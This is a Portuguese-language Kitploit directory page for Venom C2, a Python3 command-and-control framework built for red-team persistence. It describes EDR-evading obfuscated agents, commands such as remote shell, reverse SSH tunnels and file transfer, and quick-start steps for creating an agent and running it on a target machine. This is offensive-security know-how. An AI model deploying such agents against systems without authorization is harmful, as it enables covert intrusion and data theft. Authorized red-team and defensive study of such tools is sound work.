Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
venom — Venom C2 é um framework de Comando e Controle em Python3 sem dependências para persistência de redteam. | Kitploit
Ferramentas/GitHubGitHub/boku7/venom
Ferramentas de Criptografia/DescriptografiaGeração de PayloadsMecanismos de PersistênciaMovimento LateralShellcodePós-ExploraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubboku7/venom

venom

Venom C2 é um framework de Comando e Controle em Python3 sem dependências para persistência de redteam.

43675há 9 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Venom C2

O Venom C2 é um framework de Comando e Controle em Python3, sem dependências, para persistência de red team, construído para ser executado em sistemas sem instalar pacotes. Ele compreende um servidor de equipe Flask, uma GUI de operador Electron e um agente Python de arquivo único que se comunica via HTTP/HTTPS usando mensagens JSON criptografadas com AES configurável. Use-o para executar comandos, gerenciar arquivos, manter acesso e criar túneis reversos SSH a partir de sistemas comprometidos.

Contexto

Ao escalar privilégios na rede, chegamos a muitos sistemas de produção rodando distribuições e arquiteturas exóticas. Queríamos estabelecer persistência, mas nosso arsenal de ferramentas e técnicas não funcionava. Além disso, alguns sistemas alvo estavam rodando EDR.

Eram sistemas de produção, então não queríamos instalar pacotes. Precisávamos de um agente C2 que funcionasse sem dependências. Os sistemas tinham Python3 instalado, então criei o Venom C2 durante o engajamento; um agente C2 Python3 sem dependências que simplesmente funciona.

Não queríamos usar agentes C2 prontos devido ao risco de serem detectados pela blue team. Código único é rei para contornar os EDRs modernos

Como havia muitos sistemas, automatizamos a ofuscação única, nomeação, posicionamento no sistema de arquivos, diferentes domínios de callback de rede e requisições de caminho de rede únicas por agente.

Nomeei de Venom porque meu filho adora o vilão Venom do Homem-Aranha. Além disso, python é uma cobra e cobras legais têm veneno, então pareceu uma escolha adequada.

Futuro do Venom C2

Não há.

Este foi apenas um projeto C2 avulso que fiz durante o engajamento. Levou cerca de 2 dias de desenvolvimento para torná-lo estável e confiável no ambiente alvo. Ele cumpriu seu papel, nos deu persistência na rede pelas 6 semanas restantes do engajamento. Não tenho planos de continuar desenvolvendo ou usando este projeto, então achei que seria um bom candidato para divulgar publicamente.

Caso contrário, estaria perdido para o devNULL...

devnull

Componentes e Funcionalidades do Venom C2

Servidor

  • Python3 Flask
  • Servidor de equipe com suporte a múltiplos operadores
  • Salva histórico de comandos
  • Script para configurar agentes
  • Script para ofuscar agentes
  • Gerencia conexões dos agentes
  • API para comunicação com o cliente GUI
  • Perfis personalizados com seleção aleatória de grandes arrays de:
    • Nomes de parâmetros de mensagens C2
    • Cabeçalhos aleatórios
    • Atributos JSON aleatórios com tipos de valor escaláveis

GUI do Cliente

  • Electron
  • Funciona em Linux, macOS, Windows
  • GUI é uma versão simplificada da GUI do Loki

Agente

  • Python3 sem dependências
  • Mensagens criptografadas usando chaves AES configuráveis
  • Todas as mensagens enviadas como requisições POST JSON
  • Perfis personalizados com seleção aleatória de grandes arrays de:
    • Caminhos base de URI (úteis para configurar roteamento de proxy reverso)
    • Múltiplos caminhos URI para cada função do agente
    • Nomes de parâmetros de mensagens C2
    • User agents
    • Cabeçalhos aleatórios
    • Atributos JSON aleatórios com tipos de valor escaláveis

Comandos do Agente

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Display this help menu
ls       : List directory contents
pwd      : Show current working directory
cd       : Change directory
cat      : Display file contents
mv       : Move/rename files or directories
cp       : Copy files or directories
mkdir    : Create directory
rmdir    : Remove empty directory
write    : Write content to file
chmod    : Change file permissions
rm       : Remove (delete) files
shell    : Execute raw shell command
sleep    : Make agent sleep with optional jitter
sshrev   : Create reverse SSH tunnel
kill     : Terminate agent process
upload   : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box

Início Rápido

1. Obtenha o código no seu servidor

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. Instale os requisitos do servidor (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. Execute o servidor

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • Na primeira execução, o nome de usuário e senha do admin são gerados e exibidos no console. Copie e armazene para autenticar o cliente no servidor.
  • Ou defina os seus próprios: python3 server.py --adduser <USUARIO> <SENHA>

4. Execute o Cliente na Estação de Trabalho

Execute a interface do cliente na sua estação de trabalho (não no servidor). Ela deve conseguir acessar o servidor.

root@kitploit:~
cd ../client
npm install
npm run start

Abra o cliente, vá em Config e insira as credenciais do servidor.

Segurança

O caminho base da API do cliente do servidor é /api/. Não exponha /api/ para a internet pública. Use VPN ou regras rigorosas de firewall/proxy reverso para que apenas clientes confiáveis possam acessá-lo.

5. Crie um Agente

A partir do diretório server:

root@kitploit:~
python3 agent_create.py -H <host_servidor> -P <porta_servidor> [-http]

6. Ofusque o Agente

A partir do diretório server:

root@kitploit:~
python3 agent_obfuscate.py agents/<arquivo_agente_gerado>.py

7. Execute o Agente

Para ser executado no computador alvo que você quer controlar.

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
Baixar ferramenta